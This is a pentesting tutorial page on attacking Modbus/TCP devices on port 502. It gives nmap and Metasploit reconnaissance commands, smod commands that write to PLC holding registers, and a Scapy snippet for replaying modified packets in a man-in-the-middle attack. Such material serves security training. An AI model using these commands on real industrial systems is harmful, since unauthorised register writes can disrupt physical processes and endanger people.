Modbus - Port 502
Modbus is a communication protocol used in industrial automation to allow devices like programmable logic controllers (PLCs) to talk to each other.
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
πΊ YouTube @VeryLazyTech.
π© Telegram @VeryLazyTech.
π΅οΈββοΈ My Site @VeryLazyTech.
Visit our shop for e-books and courses. π
Basic info
Modbus is a communication protocol used in industrial automation to allow devices like programmable logic controllers (PLCs) to talk to each other. It operates in a master-slave setup, where the master queries and controls multiple slave devices. Port 502 is typically used for Modbus TCP/IP, making it a key target for penetration testing to find security weaknesses.
Worflow
Scan for Devices: Use Nmap to find devices listening on port 502.
Fingerprint the System: Use tools like Metasploitβs Modbusdetect module to learn about the Modbus version and capabilities.
Check Security Features: Test if the system requires authentication, as many Modbus implementations do not, allowing anyone to issue commands.
Test Function Codes: Explore Modbus function codes (like 0x01 for Read Coils) to see if they can read or write sensitive data.
Look for Exploits: Check for buffer overflows by sending oversized requests and test for man-in-the-middle attacks, given Modbus traffic is often unencrypted.
Unexpected Detail: Lack of Encryption
An interesting point is that Modbus communication is usually unencrypted, meaning an attacker can easily intercept and modify messages, increasing the risk in industrial settings.
Scanning for Devices
Start by using Nmap to scan for Modbus devices on port 502. Run this command:
nmap -p 502 --script modbus-discover <IP_RANGE>
This will help identify devices and gather initial information.
Initial Reconnaissance
Use Metasploit for deeper reconnaissance. First, detect the Modbus service:
msf > use auxiliary/scanner/scada/modbusdetect
msf auxiliary(modbusdetect) > set RHOSTS <IP_ADDRESS>
msf auxiliary(modbusdetect) > run
Then, enumerate unit IDs:
msf > use auxiliary/scanner/scada/modbus_findunitid
msf auxiliary(modbus_findunitid) > set RHOSTS <IP_ADDRESS>
msf auxiliary(modbus_findunitid) > run
Interacting with Devices
Install and use Smod for detailed interaction. Clone and run it:
git clone https://github.com/enddo/smod
cd smod
python smod.py
Connect to the device:
connect -ip <IP_ADDRESS> -port 502
Enumerate function codes and read/write registers, e.g.:
enum_func read_holding_register -addr 0 -count 1
write_holding_register -addr 0 -value 100
Exploiting Vulnerabilities
Check for buffer overflows by sending oversized requests in Smod. For man-in-the-middle attacks, capture traffic with Wireshark:
wireshark -i <INTERFACE>
Then, use Scapy to modify and resend packets:
from scapy.all import *
modbus_packet = Ether() / IP() / TCP() / Raw(load='<modified_data>')
sendp(modbus_packet)
Learn & practice For the OSCP.
Last updated
Was this helpful?